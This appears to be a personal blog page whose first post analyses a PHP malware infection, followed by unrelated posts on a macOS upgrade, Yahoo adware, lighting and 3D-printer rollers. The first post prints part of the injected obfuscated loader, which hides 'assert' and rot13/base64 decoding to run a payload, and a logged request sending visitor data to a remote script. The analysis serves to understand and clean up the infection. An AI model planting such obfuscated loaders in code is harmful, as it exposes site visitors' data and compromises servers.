Battle against injected PHP

My main personal web server became infected with some effin malware that was injected it very nearly every single .php script on the server. The injected code was basically:

//###=CACHE START=###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
...etc

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtX...."));'); $strings($light);
//###=CACHE END=###

This is kind of beautiful to me, it took me a little while to figure out what it does. In effect it causes basic system info for anyone browsing sites on that server to be sent off to some other php script on another server. At first I altered the server and my network to prevent any traffic from reaching the intended target. Instead I captured the traffic so I could get a look at the volume of it. Here’s an example apache log message generated by someone browsing an infected site:

- (127.0.0.1) - - [13/Nov/2016:14:01:20 -0700] "GET /get.php?ip=192.168.1.200&d=mysite.com%2Fclass-aptent-taciti-sociosqu-ad-litora%2F&u=Mozilla%2F5.0+%28iPhone%3B+CPU+iPhone+OS+7_0+like+Mac+OS+X%29+AppleWebKit%2F537.51.1+%28KHTML%2C+like+Gecko%29+Version%2F7.0+Mobile%2F11A465+Safari%2F9537.53+%28compatible%3B+bingbot%2F2.0%3B+%2Bhttp%3A%2F%2Fwww.bing.com%2Fbingbot.htm%29&i=1&h=85f7d3bd42bb5caa72817bcd75723fbc HTTP/1.0" 404 466 "-" "-"

After kind of a lot of effort, I came up with a script that purged this malware from my server’s file system. SUuuuuure I could have restored from backup, but that’s not nearly as interesting or dangerous.

Here’s the searchAndDestroy script I came up with.

MacPro3,1 upgrade to macOS Sierra

The time came to upgrade my trusty MacPro3,1 to macOS Sierra. As many know, El Cap is the latest build of OS X macOS that supports this platform. How to a MacPro3,1 on Sierra is well-documented, nevertheless this blog is half just a diary that I use to re-trace my steps later.

Continue reading MacPro3,1 upgrade to macOS Sierra

Boycott Yahoo!

Yahoo! used to be an awesome business that had a few products I used. But I’ve noticed lately when I install certain free utility applications, Yahoo! has managed to pepper-in their own adware.

Dear Yahoo!,

It’s time for a major course-correction. Either die entirely or get your crap together. Tricking people in to using your products is an impressively sketchy proposition. Cease and desist this despicable practice right now.

Yours truly,

The entire Internet.

Illuminatrix

Screen Shot 2016-06-23 at 12.59.12 AM

I first posted about my lighting solution in Cupcake155 Episode 4, it’s since evolved a bit and it’s time for an update.

Continue reading Illuminatrix

DeltaFlyer Episode II: Prime Line Rollers

DeltaFlyer Episode II was originally posted to hackaday.io. I’ve mirrored it here for my own purposes.

For the Delta Flyer’s maiden voyage, I opted to go cheap and use Prime Line rollers (referenced in an earlier log). They’re fairly inexpensive and I didn’t have much grief finding them at a couple different local stores. They definitely have slop in them, so they’re not really a good choice and probably go from rough to terrible as print speed is increased. Episode II here is to illustrate how well these actually work.

I found that I could get passable motion. I ultimately replaced the Prime Line rollers with Delrin rollers. I was stunned to find the first prints out of the Delrin’s looked exactly the same as the Prime Line wheels. This led to eventually find my main source of error was my print bed could move during the print. Therefore, I’m not really sure what the quality limit on the Prime Line rollers really is. My guess is you could get pretty damn good but if you tried to print fast, the slop in the bearings would become intolerable.

My Photo Album for Episode II is here.